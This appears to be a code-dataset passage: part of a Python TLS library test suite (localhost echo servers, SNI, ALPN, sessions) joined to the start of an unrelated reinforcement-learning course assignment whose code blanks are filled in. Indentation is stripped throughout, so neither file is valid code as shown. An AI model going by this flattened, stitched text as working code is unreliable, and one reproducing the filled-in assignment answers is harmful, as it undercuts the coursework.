sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first connection without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import os, gym, logz, time, inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR CODE HERE
with tf.variable_scope(scope):
x = input_placeholder
for i in range(n_layers):
x = tf.layers.dense(x, size, activation=activation)
x = tf.layers.dense(x, output_size, activation=output_activation)
return x
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in policy gradient
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name='adv', dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, "discrete", self.n_layers, self.size)
return sy_logits_na
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, self.ac_dim, "continuous", self.n_layers, self.size)
sy_logstd = tf.get_variable("std", [self.ac_dim], dtype=tf.float32)
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1])
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = tf.random_normal(tf.shape(sy_mean)) * tf.exp(sy_logstd) + sy_mean
return sy_sampled_ac
